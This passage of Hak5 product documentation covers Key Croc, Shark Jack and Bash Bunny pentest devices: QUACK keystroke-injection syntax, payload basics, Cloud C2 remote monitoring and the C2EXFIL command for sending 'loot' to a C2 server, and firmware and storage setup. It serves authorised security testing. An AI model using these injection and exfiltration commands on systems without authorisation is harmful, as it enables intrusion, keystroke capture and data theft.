There are nearly 2000 compatible keys which may be used directly with the QUACK command. For example, “`QUACK y`” will type “`y`”, and “`QUACK ENTER`” will press enter. Likewise, “`QUACK CTRL-c`” will hold the `Control` key and press `c`. Additionally, “`QUACK N`” will hold `Shift` and press `n` – since there is no capital N key on a keyboard.
For a complete list, edit the json file from the languages directory specified by your particular `DUCKY_LANG`. Any single key or key combination may be specified. Here are a few choice examples:
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#example-1)
`GUI r CMD-SPACE ALT-F2 CTRL-ALT-DELETE`
### **TECHNICAL DETAIL** [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#technical-detail)
By default, `QUACK` will use the modifiers on the left side of the keyboard when injecting keystrokes. This behavior may be changed, either by modifying the language file or by using the keycode option with a specific modifier scan code. Both left and right side modifiers are specified in the language file for any given key combination/ The first instance is given priority.
info
For example, `CTRL-c` can be pressed with the Control key on the left, or on the right side of the keyboard. This will result in either “`01,00,06`” or “`10,00,06`” scan code.
QUACK STRING [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#quack-string)
-------------------------------------------------------------------------------------------------------
`STRING` processes the text following taking special care to auto-shift. `STRING` can accept a single or multiple characters. There will be no `ENTER` or Carriage return key at the end of a `STRING` – so if one is desired it must be specified with its own `QUACK` command. `STRING` will automatically use `SHIFT` to capitalize a character.
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#example-2)
`QUACK STRING The Quick Brown Fox Jumped Over The Lazy Dog QUACK STRING "This string has special characters! Isn't it great?"`
See the notes at the end of this section on handling requirements for `QUACK` `STRING` as it relates to quotes and escaping special bash characters.
QUACK DELAY [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#quack-delay)
-----------------------------------------------------------------------------------------------------
`DELAY` creates a momentary pause in the ducky script. It is quite handy for creating a moment of pause between sequential commands that may take the target computer some time to process. `DELAY` time is specified in milliseconds from 1 to 10000. Multiple `DELAY` commands can be used to create longer delays.
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/#example-3)
`QUACK GUI r QUACK DELAY 500 QUACK STRING cmd /k tree c:\ QUACK ENTER`
info
Note the 500 millisecond delay between the keyboard shortcut “`GUI r`” and the cmd command? That’s because it takes a few milliseconds for the run dialog to appear before we can inject keystrokes. We don’t typically think about these nuances as a human, but when you consider the Key Croc is one computer speaking to another, every millisecond counts.
* * *
[_navigate\_before_ The SAVEKEYS Command](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/)
[Advanced Quack Commands _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/)
---
# Payload Development Basics | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Payload Development Basics
==========================
Shark Jack payloads are written in Bash with Ducky Script and can be developed in any standard text editor, such as notepad or vi.
Payload files must be named either payload.sh or payload.txt.
Payloads should begin with the typical shebang /bin/bash.
`#!/bin/bash`
* * *
[_navigate\_before_ Over The Air Upgrade](https://docs.hak5.org/shark-jack/software-updates/over-the-air-upgrade/)
[The NETMODE Command _navigate\_next_](https://docs.hak5.org/shark-jack/writing-payloads/the-netmode-command/)
---
# Using The Shark Jack With The Plunder Bug As A Simple Switch | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Using The Shark Jack With The Plunder Bug As A Simple Switch
============================================================
In a way, the Plunder Bug can be used as a simple switch. In the following example, the Plunder Bug is used to provide the laptop (via USB-C) and the Shark Jack (or any ordinary Ethernet device) network access via the WAN/Uplink port (closest to the Plunder Bug’s status LED).

}}
* * *
[_navigate\_before_ Charge The Shark Jack From Your Phone](https://docs.hak5.org/shark-jack/tips-and-tricks/charge-the-shark-jack-from-your-phone/)
[Android Serial Setup For Shark Jack Cable _navigate\_next_](https://docs.hak5.org/shark-jack/tips-and-tricks/android-serial-setup-for-shark-jack-cable/)
---
# Shark Jack by Hak5 | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Shark Jack by Hak5
==================
A portable network attack and automation tool for pentesters and systems administrators designed to enable social engineering engagements and opportunistic wired network auditing.
This documentation covers the basics of operation and deployment, accessing the Linux shell for advanced operations, Internet connectivity, software updates and payload development.

}}
warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
* [The Shark Jack by Hak5](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/README.md)
Getting Started [_link_](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/#getting-started)
-----------------------------------------------------------------------------------------------
* [Shark Jack Basics](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/)
* [Default Settings](https://docs.hak5.org/shark-jack/getting-started/default-settings/)
Beginner Guides [_link_](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/#beginner-guides)
-----------------------------------------------------------------------------------------------
* [Unboxing and Setup](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/)
* [Using sharkjack.sh](https://docs.hak5.org/shark-jack/beginner-guides/using-sharkjack.sh/)
* [Two Key Commands](https://docs.hak5.org/shark-jack/beginner-guides/two-key-commands/)
* [Writing a Simple Payload](https://docs.hak5.org/shark-jack/beginner-guides/writing-a-simple-payload/)
Software Updates [_link_](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/#software-updates)
-------------------------------------------------------------------------------------------------
* [Manual Upgrade](https://docs.hak5.org/shark-jack/software-updates/manual-upgrade/)
* [Over-the-Air Upgrade](https://docs.hak5.org/shark-jack/software-updates/over-the-air-upgrade/)
Writing Payloads [_link_](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/#writing-payloads)
-------------------------------------------------------------------------------------------------
* [Payload Development Basics](https://docs.hak5.org/shark-jack/writing-payloads/payload-development-basics/)
* [The NETMODE Command](https://docs.hak5.org/shark-jack/writing-payloads/the-netmode-command/)
* [The LED Command](https://docs.hak5.org/shark-jack/writing-payloads/the-led-command/)
* [The SWITCH Command](https://docs.hak5.org/shark-jack/writing-payloads/the-switch-command/)
* [The BATTERY Command](https://docs.hak5.org/shark-jack/writing-payloads/the-battery-command/)
* [The SERIAL\_WRITE Command](https://docs.hak5.org/shark-jack/writing-payloads/the-serial_write-command/)
* [The Cloud C2 commands](https://docs.hak5.org/shark-jack/writing-payloads/the-cloud-c2-commands/)
* [Included Tools](https://docs.hak5.org/shark-jack/writing-payloads/included-tools/)
Managing Payloads [_link_](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/#managing-payloads)
---------------------------------------------------------------------------------------------------
* [The UPDATE\_PAYLOADS Command](https://docs.hak5.org/shark-jack/managing-payloads/the-update_payloads-command/)
* [The LIST Command](https://docs.hak5.org/shark-jack/managing-payloads/the-list-command/)
* [The ACTIVATE Command](https://docs.hak5.org/shark-jack/managing-payloads/the-activate-command/)
Troubleshooting [_link_](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/#troubleshooting)
-----------------------------------------------------------------------------------------------
* [Firmware Recovery](https://docs.hak5.org/shark-jack/troubleshooting/firmware-recovery/)
Tips & Tricks [_link_](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/#tips--tricks)
------------------------------------------------------------------------------------------
* [Charge the Shark Jack from your Phone](https://docs.hak5.org/shark-jack/tips-and-tricks/charge-the-shark-jack-from-your-phone/)
* [Using the Shark Jack with the Plunder Bug as a simple switch](https://docs.hak5.org/shark-jack/tips-and-tricks/using-the-shark-jack-with-the-plunder-bug-as-a-simple-switch/)
* [Android Serial Setup for Shark Jack Cable](https://docs.hak5.org/shark-jack/tips-and-tricks/android-serial-setup-for-shark-jack-cable/)
Product Information [_link_](https://docs.hak5.org/shark-jack/shark-jack-by-hak5/#product-information)
-------------------------------------------------------------------------------------------------------
* [Specifications](https://docs.hak5.org/shark-jack/product-information/specifications/)
* [Important Safety Information and Warnings](https://docs.hak5.org/shark-jack/product-information/important-safety-information-and-warnings/)
* * *
[Shark Jack Basics _navigate\_next_](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/)
---
# The UPDATE_PAYLOADS Command | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The UPDATE\_PAYLOADS Command
============================
The `UPDATE_PAYLOADS` command will synchronize the local payload library (stored in `/root/payload/library/`) with the repository online. This command is expected to be run from Arming Mode, and is intended for use with the Shark Jack Cable.
info
The `UPDATE_PAYLOADS` command was introduced with firmware 1.2.0 on the Shark Jack Cable and requires an internet connection.
check\_circle
In many cases an Internet connection may be enabled in Arming mode by issuing the command `NETMODE DHCP_CLIENT`.
Usage [_link_](https://docs.hak5.org/shark-jack/managing-payloads/the-update_payloads-command/#usage)
------------------------------------------------------------------------------------------------------
`root@shark:~# UPDATE_PAYLOADS Downloading payloads repository... Successfully syncronized payloads repository. root@shark:~#`
warning
The `UPDATE_PAYLOADS` command will make an Internet connection to github.com/hak5. Consider updating your payloads before connecting to the client site network on any physical engagement.
Troubleshooting [_link_](https://docs.hak5.org/shark-jack/managing-payloads/the-update_payloads-command/#troubleshooting)
--------------------------------------------------------------------------------------------------------------------------
If you receive an Internet connection error like the following:
> You must have an internet connection to sync the payload libraries.
Check to ensure that the eth0 interface has an Internet connection. If the IP address is statically assigned to `172.16.24.1`, rather than an address on the target network via DHCP, run the `NETMODE DHCP_CLIENT` command and try `UPDATE_PAYLOADS` again.
* * *
[_navigate\_before_ Included Tools](https://docs.hak5.org/shark-jack/writing-payloads/included-tools/)
[The LIST Command _navigate\_next_](https://docs.hak5.org/shark-jack/managing-payloads/the-list-command/)
---
# Specifications | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Specifications
==============
Shark Jack [_link_](https://docs.hak5.org/shark-jack/product-information/specifications/#shark-jack)
-----------------------------------------------------------------------------------------------------
SOC: MT7628DAN
INTERFACE: Ethernet
STANDARDS: 802.3
SIZE: 62 x 21 x 12 mm
POWER: 2.5W (USB 5V 0.5A)
BATTERY: 1S 401020 3.7V 50mAh 0.2W LiPo
OPERATING TEMPERATURE: 35ºC ~ 45ºC
STORAGE TEMPERATURE: -20ºC ~ 50ºC
RELATIVE HUMIDITY: 0% to 90% (noncondensing)
Shark Jack Cable [_link_](https://docs.hak5.org/shark-jack/product-information/specifications/#shark-jack-cable)
-----------------------------------------------------------------------------------------------------------------
SOC: MT7628DAN
INTERFACE: Ethernet, USB UART (CP2102)
STANDARDS: 802.3
SIZE: 62 x 21 x 12 mm
POWER: 2.5W (USB 5V 0.5A)
OPERATING TEMPERATURE: 35ºC ~ 45ºC
STORAGE TEMPERATURE: -20ºC ~ 50ºC
RELATIVE HUMIDITY: 0% to 90% (noncondensing)
* * *
[_navigate\_before_ Android Serial Setup For Shark Jack Cable](https://docs.hak5.org/shark-jack/tips-and-tricks/android-serial-setup-for-shark-jack-cable/)
[Important Safety Information And Warnings _navigate\_next_](https://docs.hak5.org/shark-jack/product-information/important-safety-information-and-warnings/)
---
# Firmware Recovery | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Firmware Recovery
=================
The Shark Jack features a firmware recovery option which allows the user to restore the devices firmware image. This procedure is performed via a special web interface.
Download the latest firmware image for your Shark Jack from the Hak5 [Download Center](https://downloads.hak5.org/shark)
.
It is extremely important that you follow the directions precisely as it pertains to powering the device and image selection from the web recovery interface. The video is provided as a reference however does not replace carefully reading the instructions listed below.
Follow these steps to access the recovery web interface and update the firmware.
info
Shark Jack Cable users: begin firmware recovery at step three.
1. With the switch in the OFF position, plug in a suitable USB power source and fully charge the Shark Jack. The LED will blink blue while charging, and solid blue when fully charged. If no LED activity is present, leave the Shark Jack connected to the power source for 10 minutes.
2. Unplug the Shark Jack completely from the USB power source
3. Prepare to press the Shark Jack reset button located on the bottom of the device next to the regulatory label. Using a paperclip, SIM card removal tool or similar instrument practice pressing the button. With the Shark Jack unplugged and with its switch in the off position, carefully insert the instrument and directly downward until you feel resistance. Gently press the button. You should feel a click.
4. With the instrument at the ready, flip the switch into the arming (middle) position and immediately after press and hold the reset button for 7 seconds.
5. Connect a USB power source to the Shark Jack
6. Connect the Shark Jack to your host PC Ethernet interface. After a moment the Shark Jack LED will indicate solid green with intermittent activity flashes.
7. Set a static IP address for the host PC Ethernet interface connected to the Shark Jack as follows:
* IP Address: 192.168.1.2
* Netmask: 255.255.255.0
8. From the host PC, browse to [http://192.168.1.1](http://192.168.1.1/)
9. A Shark Jack Recovery interface with a red banner will appear. Click to the Recovery tab, then click Browse Firmware, select the Shark Jack firmware downloaded from the Hak5 Download Center, then click Start Upload File.
* If your Shark Jack web interface shows a blue banner reading Web Failsafe Recovery, click the OS tab, then click browse, select the Shark Jack firmware downloaded previously, then click Start Upload File. If your Shark Jack features the blue bannered Web Failsafe Recovery interface, it is extremely important that you select the OS tab and not the Firmware tab or any other tab as doing so will render the device inoperable.
10. This process will take several minutes. Do not interrupt the power supply while the firmware is updating. Once complete, the Shark Jack will restart as indicated by a green blinking LED. At this point, disable the static IP address on the host PC Ethernet interface connected to the Shark Jack and reset it to receive an IP address automatically via DHCP.
report
DO NOT UNPLUG THE SHARK JACK CABLE DURING THE FIRMWARE RECOVERY PROCESS. This process will require 5-10 minutes. Powering off the Shark Jack Cable at this time will result in damage to the device that may render it inoperable.
* * *
[_navigate\_before_ The ACTIVATE Command](https://docs.hak5.org/shark-jack/managing-payloads/the-activate-command/)
[Charge The Shark Jack From Your Phone _navigate\_next_](https://docs.hak5.org/shark-jack/tips-and-tricks/charge-the-shark-jack-from-your-phone/)
---
# Manual Upgrade | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Manual Upgrade
==============
Shark Jack firmware may be updated by using the [sharkjack.sh](https://downloads.hak5.org/shark)
helper script. That said, it is also possible to manually upgrade the firmware by following this process:
1. Download the latest UPDATE file from [https://downloads.hak5.org/shark](https://downloads.hak5.org/shark)
and [verify its checksum](https://docs.hak5.org/hc/en-us/articles/360049922674)
.
2. Power on the Shark Jack in Arming Mode and connect it to a reliable USB power source
3. Copy the file upgrade file to the Shark Jack’s /tmp directory via SCP (e.g. “`scp upgrade-1.1.0.bin root@172.16.24.1:/tmp/`”)
4. SSH into the Shark Jack (e.g. “`ssh root@172.16.24.1`”)
5. From the Shark Jack’s bash prompt, issue the sysupgrade command relevant to your firmware update file (e.g. “`sysupgrade -n /tmp/upgrade-1.1.0.bin`”)
6. Wait 5-10 minutes as the Shark Jack flashes the firmware and reboots.
report
DO NOT unplug the device from USB power during this process as doing so will render the device inoperable. This process will require 5-10 minutes. Powering off the Shark Jack at this time will result in damage to the device.
* * *
[_navigate\_before_ Writing A Simple Payload](https://docs.hak5.org/shark-jack/beginner-guides/writing-a-simple-payload/)
[Over The Air Upgrade _navigate\_next_](https://docs.hak5.org/shark-jack/software-updates/over-the-air-upgrade/)
---
# The Cloud C2 Commands | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The Cloud C2 Commands
=====================
The Shark Jack is Cloud C2 enabled — meaning it can be used remotely with the Hak5 Cloud C2 server to exfiltrate loot or be managed from the web interface or web shell.
To provision the Shark Jack for Cloud C2 server, see the guide on [adding devices](https://docs.hak5.org/cloud-c2/getting-started/adding-devices)
.
### C2CONNECT [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-cloud-c2-commands/#c2connect)
Unlike some Hak5 devices, such as the WiFi Pineapple, the connection to Cloud C2 is not automatic. First, the `C2CONNECT` command must be run, either interactively (Shark Jack Cable) or from the payload.
report
If the `C2CONNECT` command fails, check the `/tmp/cc-client-error.log` file for “Error posting update to server” entries, which may indicate that the system clock is out of date. Verify with the `date` command, and if necessary rectify this with an NTP update manually using the command `ntpd -q -p 1.openwrt.pool.ntp.org`
### C2CONNECT [_link_](https://docs.hak5.org/shark-jack/writing-payloads/the-cloud-c2-commands/#c2connect-1)
With a Cloud C2 connection established, loot may be exfiltrated using the `C2EXFIL` command.
`root@shark:~# C2EXFIL STRING /tmp/cc-client-error.log "The Cloud C2 error log" Starting C2 Exfil Tool Loot sent Successfully`
* * *
[_navigate\_before_ The SERIAL\_WRITE Command](https://docs.hak5.org/shark-jack/writing-payloads/the-serial_write-command/)
[Included Tools _navigate\_next_](https://docs.hak5.org/shark-jack/writing-payloads/included-tools/)
---
# Configuring Cloud C | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Configuring Cloud C
===================
The Key Croc can be configured to connect to a Cloud C2 instance for remote keystroke monitoring, injection, exfiltration and payload management.
info
To use this feature, the WiFi must be configured via the`config.txt` on the Key Croc udisk.
info
Learn more about this self-hosted server and download the free community edition from [https://c2.hak5.org](https://c2.hak5.org/)
Registering the device to Cloud C2 [_link_](https://docs.hak5.org/key-croc/configuration/configuring-cloud-c/#registering-the-device-to-cloud-c2)
--------------------------------------------------------------------------------------------------------------------------------------------------
1. From the Cloud C2 device listing, click the (+) Add Device button.
2. From the Add Device dialog, name the device, select Key Croc as the device type and click Add Device.
3. From the new devices Overview page, click Setup to download the `device.config` file.
4. With the Key Croc connected and in arming mode, save the `device.config` file to the root of the Key Croc udisk.
5. Finally, **safely eject** the Key Croc udisk and reboot the Key Croc by unplugging and replugging the device.
For additional help on using Cloud C2 server, see the Cloud C2 documentation at [https://docs.hak5.org](https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2)
Information on using Cloud C2 functions in your payloads can be found in the [Payload Development](https://docs.hak5.org/key-croc/configuration/configuring-cloud-c/writing-payloads/key-croc-payload-development.md)
section of this documentation.
* * *
[_navigate\_before_ Configuration Options](https://docs.hak5.org/key-croc/configuration/configuration-options/)
[Default Settings _navigate\_next_](https://docs.hak5.org/key-croc/configuration/default-settings/)
---
# Mass Storage Structure | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Mass Storage Structure
======================
* /_docs_ – home to documentation.
* /_languages_ – install additional HID Keyboard layouts/languages.
* /_loot_ – used by payloads to store logs and other data
* /_tools_ – used to install additional deb packages and other tools.
* /_payloads_ – home to active payloads, library and extensions
* /_payloads_/_switch1_ and _/payloads_/_switch2_ – home to payload.txt and accompanying files which will be executed on boot when the bash bunny switch is in the corresponding position.
* /_payloads_/_library_ – home to the payloads library which can be downloaded from the [Bash Bunny Payload git repository](https://github.com/hak5/bashbunny-payloads)
* /_payloads_/_library_/_extensions_ – home to Bash Bunny extensions
info
**Bash Bunny Mark II Note:**
If a MicroSD card is present at boot in either switch positions 1 or 2, /root/udisk will symlink to the root of the MicroSD card. Otherwise the udisk partition will behave as usual on the internal SSD.
* * *
[_navigate\_before_ Switch Positions](https://docs.hak5.org/bash-bunny/getting-started/switch-positions/)
[LED Status Indications _navigate\_next_](https://docs.hak5.org/bash-bunny/getting-started/led-status-indications/)
---
# LED Status Indications | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
LED Status Indications
======================
| LED | Status |
| --- | --- |
| Green (blinking) | Booting up |
| Blue (blinking) | Arming Mode |
| Red (blinking) | Recovery Mode or Firmware Flashing _from v1.0_ **DO NOT UNPLUG** |
| Red/Blue Alternating | Recovery Mode or Firmware Flashing _from v1.1+_ **DO NOT UNPLUG** |
* * *
[_navigate\_before_ Mass Storage Structure](https://docs.hak5.org/bash-bunny/getting-started/mass-storage-structure/)
[Installing Additional Tools _navigate\_next_](https://docs.hak5.org/bash-bunny/getting-started/installing-additional-tools/)
---
# Installing Additional Tools | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Installing Additional Tools
===========================
While many tools can be installed to the Bash Bunny as you would any typical Debian based Linux computer, such as `apt install`, or `git clone`, a dedicated tools folder from the mass storage partition simplifies the process. Accessible from arming mode, tools in either .deb format or entire directories can be easily copied to `/tools` on the root of the mass storage partition. Then on the next boot of the Bash Bunny in Arming mode, these tools will be installed – indicated by `LED SETUP` (Solid Magenta light).
On boot into arming mode, any .deb file placed in the tools folder will be installed with `dpkg`. Then any remaining file or directory will be moved to `/tools` on the root file system.
Some payloads may require additional third party tools. For example, the [rdp\_checker](https://payloadhub.com/blogs/payloads/rdp-checker)
payload requires impacket to be located in /tools/impacket. This can be installed by copying either the impacket directory or an impacket.deb file to the `/tools` directory and booting into arming mode. The rdp\_checker payload also makes use of the `REQUIRETOOL` extension, which checks for the existence of this tool and exits with a red blinking `LED FAIL` state if the tool is not found.
A list of pre-compiled tools is available from [this forum thread](https://forums.hak5.org/topic/40971-info-tools/)
.
* * *
[_navigate\_before_ LED Status Indications](https://docs.hak5.org/bash-bunny/getting-started/led-status-indications/)
[Installing Additional Languages _navigate\_next_](https://docs.hak5.org/bash-bunny/getting-started/installing-additional-languages/)
---
# Installing Additional Languages | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Installing Additional Languages
===============================
Bash Bunny payloads can execute keystroke injection attacks similar to the USB Rubber Ducky by using the HID ATTACKMODE. By default this mode uses a US keyboard layout. Additional keyboard layouts may be developed by the community. Installing additional keyboard layouts is similar to use of the tools folder on the root of the USB mass storage partition. On boot-up into arming mode, any two-letter-country-code.json file located in the /languages folder on the root of the USB mass storage partition will be installed. The file will remain in /languages after installation.
With a new language file installed, one may specify the keyboard layout from a payload by using the **DUCKY\_LANG** extension. This extension accepts a two letter country code.
**Example:**
`DUCKY_LANG us`
* * *
[_navigate\_before_ Installing Additional Tools](https://docs.hak5.org/bash-bunny/getting-started/installing-additional-tools/)
[Considerations for Mark II _navigate\_next_](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/)
---
# Switch Positions | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Switch Positions
================
In Switch Position 3 (closest to the USB plug) the Bash Bunny will boot into _arming mode_, enabling both Serial and Mass Storage. From this dedicated mode, Bash Bunny payloads may be managed via Mass Storage and the Linux shell can be accessed by the Serial console.

info
Switch positions for the Bash Bunny Mark II are unchanged from the first generation.

* * *
[_navigate\_before_ Bash Bunny by Hak5](https://docs.hak5.org/bash-bunny/bash-bunny-by-hak5/)
[Mass Storage Structure _navigate\_next_](https://docs.hak5.org/bash-bunny/getting-started/mass-storage-structure/)
---
# Considerations for Mark II | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Considerations for Mark II
==========================
The Bash Bunny Mark II adds mass exfiltration, wireless geofencing and remote trigger functionality via a MicroSD XC card reader and bluetooth low-energy radio.
All first generation payloads are compatible with the Bash Bunny Mark II.
Two considerations to keep in mind when developing and deploying payloads for the Bash Bunny Mark II; Wireless, and Storage.
WIRELESS [_link_](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/#wireless)
---------------------------------------------------------------------------------------------------------
If desired, the `WAIT_FOR_PRESENT` or `WAIT_FOR_NOT_PRESENT` extensions may be used for geofencing and remote triggers. When using these extensions, the bluetooth wireless landscape will be temporarily read to /tmp/bt\_observation
Further reading:
* [REMOTE TRIGGERS FOR THE BASH BUNNY MARK II](https://docs.hak5.org/bash-bunny/beginner-guides/remote-triggers-for-the-bash-bunny-mark-ii/)
STORAGE [_link_](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/#storage)
-------------------------------------------------------------------------------------------------------
A few key points to note when using a MicroSD card with the Bash Bunny Mark II:
### **Arming Mode** [_link_](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/#arming-mode)
warning
To load payloads, boot the Bash Bunny **without a MicroSD card present.**
* Payloads are executed **from internal storage only.**
* If a MicroSD card is present at boot in arming mode, it will be passed through to the host.
### **Payload Considerations** [_link_](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/#payload-considerations)
* If `ATTACKMODE STORAGE` is active:
* In the case that a MicroSD card is present, the MicroSD Card will be presented to the target
* In the case that a MicroSD card is not present, the internal udisk partition will be presented to the target.
* By default, _after loading payloads during boot_, the udisk is **not mounted from the perspective of the Bash Bunny.**
* To mount the udisk from the perspective of the Bash Bunny, issue the command \`udisk mount\`.
### **Mounting Considerations** [_link_](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/#mounting-considerations)
* The udisk partition — whether internal or MicroSD — can only be mounted on one device at a time.
* The `/root/udisk` directory will appear blank unless \``udisk mount`\` has been executed.
* Writing to `/root/udisk` when unmounted will have no effect on the actual udisk partition.
* If both `ATTACKMODE STORAGE` (Mount to target) and \``udisk mount`\` (Mount to Bash Bunny) are used — unexpected behavior may occur as the partition cannot be handled by both the target and host simultaneously.
### **Formatting Considerations** [_link_](https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii/#formatting-considerations)
* The MicroSD card should be partitioned with a single partition formatted with a filesystem appropriate to the target
* e.g. for Windows targets: FAT32, ExFAT, NTFS
* e.g. for Mac targets: FAT32, ExFAT, APFS
* e.g. for Linux targets: FAT32, ExFAT, EXT
* While the target may support various filesystems, the host (Bash Bunny) currently only supports EXT and FAT32. Additional filesystems (ExFAT) may be included in future firmware versions.
* * *
[_navigate\_before_ Installing Additional Languages](https://docs.hak5.org/bash-bunny/getting-started/installing-additional-languages/)
[Payload Development Basics _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics/)
---
# DuckyScript™ On The Bash Bunny | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
DuckyScript™ On The Bash Bunny
==============================
**DuckyScript™ is the payload language of Hak5 gear.** It consists of a number of simple commands specific to the Bash Bunny hardware, some helper functions and the full power of the Bash Unix shell and command language. These payloads, named `payload.txt`, execute on boot by the Bash Bunny depending on the switch position.
[_Extensions_](https://docs.hak5.org/bash-bunny/writing-payloads/extensions/)
can be sourced which extend the DuckyScript language with user contributed functions and variables which enhance and simplify payloads.
All DuckyScript commands are written in ALL CAPS.
The base DuckyScript™ Bash Bunny commands are:
| COMMAND | Description |
| --- | --- |
| `ATTACKMODE` | Specifies the USB device or combination of devices to emulate. |
| `LED` | Control the RGB LED. Accepts color and pattern or payload state. |
| `QUACK` | Injects keystrokes (ducky script) or specified ducky script file. |
| `Q` | Alias for QUACK |
| `DUCKY_LANG` | Set the HID Keyboard language. _e.g: DUCKY\_LANG us_ |
### Converting from USB Rubber Ducky [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/duckyscript-on-the-bash-bunny/#converting-from-usb-rubber-ducky)
If you are looking to convert a payload from DuckyScript 1.0 from the USB Rubber Ducky, you will need to append [`QUACK`](https://docs.hak5.org/bash-bunny/writing-payloads/quack/)
to most lines in that payload to make it Bash Bunny Compatible.
* * *
[_navigate\_before_ Payload Development Basics](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics/)
[QUACK _navigate\_next_](https://docs.hak5.org/bash-bunny/writing-payloads/quack/)
---
# QUACK | Hak5 - Bash Bunny
[](https://docs.hak5.org/bash-bunny/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
QUACK
=====
The Bash Bunny inherits the original DuckyScript commands from the USB Rubber Ducky. Keystrokes can be injected from DuckyScript text files, or inline using the `QUACK` command. The `ATTACKMODE` must contain `HID` for keystroke injection.
**Examples**:
`QUACK switch1/helloworld.txt`
Injects keystrokes from the specified ducky script text file.
`QUACK STRING Hello World`
Injects the keystrokes “Hello World”
`Q ALT F4`
Injects the keystroke combination of ALT and F4
### ALT CODES [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/quack/#alt-codes)
Firmware version 1.5 added the `QUACK ALTCODE` command. This allows the printing of alt-codes on Windows system only.
`QUACK ALTCODE 168 # types an upside down question mark QUACK ALTCODE 236 # types an infinity symbol`
### Caveats [_link_](https://docs.hak5.org/bash-bunny/writing-payloads/quack/#caveats)
**When writing payloads for the bash bunny be mindful that when using `QUACK` and other DuckyScript commands you are** _**passing arguments to a script.**_
If you are using variables in your payload, and injecting keystrokes, avoid variable naming collisions!
`URL="example.com"`
`QUACK STRING $URL`
Will inject:
` example.com`
**This can be very useful for adding easily configurable parameters to your payload for others to use similar to the** [`DEFINE`pattern introduced in DuckyScript 3 on the USB Rubber Ducky](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants#define)
